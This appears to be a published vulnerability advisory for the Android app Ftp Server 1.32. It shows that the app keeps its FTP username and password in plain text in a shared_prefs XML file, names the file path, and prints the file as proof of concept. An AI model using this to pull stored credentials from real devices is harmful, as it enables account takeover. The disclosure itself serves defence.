Ftp Server 1.32 Credential Disclosure

2018.06.07
Credit: ManhNho
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Ftp Server 1.32 - Credential Disclosure # Date: 2018-05-29 # Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver # Version: 1.32 Android App # Vendor: The Olive Tree # Exploit Author: ManhNho # CVE: N/A # Category: Mobile Apps # Tested on: Android 4.4 # Description # Ftp Server 1.32 Insecure Data Storage, the result of storing confidential # information insecurely on the system i.e. poor encryption, plain text, # access control issues etc. Attacker can find out username/password of valid user via # /data/data/com.theolivetree.ftpserver/shared_prefs/com.theolivetree.ftpserver_preferences.xml # PoC <?xml version='1.0' encoding='utf-8' standalone='yes' ?> <map> <string name="prefPort">2221</string> <string name="prefPasivePort">2300-2399</string> <string name="prefUserpass">ManhNho</string> <boolean name="prefEnergySave" value="false" /> <boolean name="prefShowHidden" value="false" /> <boolean name="prefShowCredentials" value="true" /> <string name="prefInterfaces">0</string> <string name="prefHomeDir">1</string> <string name="prefUsername">ManhNho</string> <boolean name="prefReadonly" value="false" /> <boolean name="prefAnonymous" value="true" /> <boolean name="prefForeground" value="true" /> </map>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top